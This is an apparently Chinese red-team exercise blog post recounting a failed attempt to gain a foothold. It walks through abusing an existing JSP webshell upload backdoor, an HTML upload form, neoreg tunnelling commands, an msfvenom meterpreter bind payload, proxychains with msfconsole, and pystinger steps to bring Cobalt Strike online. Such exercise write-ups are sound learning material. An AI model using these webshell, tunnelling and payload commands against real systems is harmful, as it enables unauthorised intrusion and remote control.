记一次失败的打点

简介: 记一次失败的打点

背景


在某次攻防演练的晚上,大佬给我一个网站,说有一个RCE漏洞打一下试试,抱着试试就逝世的心态,进行了打点行动。


上传webshell


在web目录发现了一个已存在木马xx.jsp


<%if(request.getParameter("f".getBytes());%>< a href="One_OK"></ a>

利用已经存在的上传后门,构建一个html表单来上传我们的自己木马


<form action="http://xx.x.x.x:8080/scdc/xx.jsp?f=fuckjp.jsp" method="post">      <textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>    <input type=submit value="提交">  </form>

目标不出网,无法外联


neoreg


还原大致流程


生成neoreg


py -2 neoreg.py generate -k password


上传&验证


py -2 neoreg.py -k password -u http://192.168.11.132/3.php`

msf上线


msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=9001 -f exe -o reverse.exe

gedit /etc/proxychains4.conf


bd96902dccc9a0c18951361d921ad0be_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



proxychains4 msfconsole


97ab06f717b7f44c95119465262494fe_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


0458455f8bbc5b2342e6870ddcfb0b53_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


CS上线

pystinger


蚁剑上传proxy.phpstinger_server.exe并执行  start stinger_server.exe



攻击机执行


stinger_client.exe -w http://192.168.11.132/proxy.php -l 127.0.0.1 -p 60000


9013c3ca539d454049c855ae346f3ad2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


设置监听


2ea055c423a37255c418e141845493cf_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


上线


2ed2eaf610386f206137f593df9085cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



结束语


最后不幸被蓝队发现,痛失权限,打点失败。


相关文章
|
机器学习/深度学习 存储 缓存
mPaaS扫码速度过快导致出错的问题
mPaaS扫码速度过快导致出错的问题
123 1
FeignClient打印请求失败的日志,打印所有feignCliet接口请求失败的错误日志,方便排查原因
FeignClient打印请求失败的日志,打印所有feignCliet接口请求失败的错误日志,方便排查原因
253 0
|
2月前
|
JSON 缓存 fastjson
一行日志引发的系统异常
本文记录了一行日志引发的系统异常以及作者解决问题的思路。
|
3月前
|
消息中间件 负载均衡 调度
异步任务处理系统问题之自动重试是如何在Level 3的系统中实现的问题如何解决
异步任务处理系统问题之自动重试是如何在Level 3的系统中实现的问题如何解决
|
5月前
|
监控 关系型数据库 MySQL
Flink实现实时异常登陆监控(两秒内多次登陆失败进行异常行为标记)
Flink实现实时异常登陆监控(两秒内多次登陆失败进行异常行为标记)
107 1
|
SQL 前端开发 测试技术
一次纯线上接口异常的排查过程
一次纯线上接口异常的排查过程
144 0
|
6月前
|
JavaScript IDE Java
bugly崩溃排查3:观察是谁调用了崩溃函数
bugly崩溃排查3:观察是谁调用了崩溃函数
75 0
|
消息中间件 存储 资源调度
订单超时怎么处理?我们用这种方案
在电商业务下,许多订单超时场景都在24小时以上,对于超时精度没有那么敏感,并且有海量订单需要批处理,推荐使用基于定时任务的跑批解决方案。
1598 7
订单超时怎么处理?我们用这种方案
|
Java
线上异常日志没有堆栈信息
只能在本地调试查找异常位置,但是在本地调试过程中却可以打印异常堆栈的。后来继续查找之前的日志,之前的某段时间这个地方是存在异常堆栈信息的。
301 0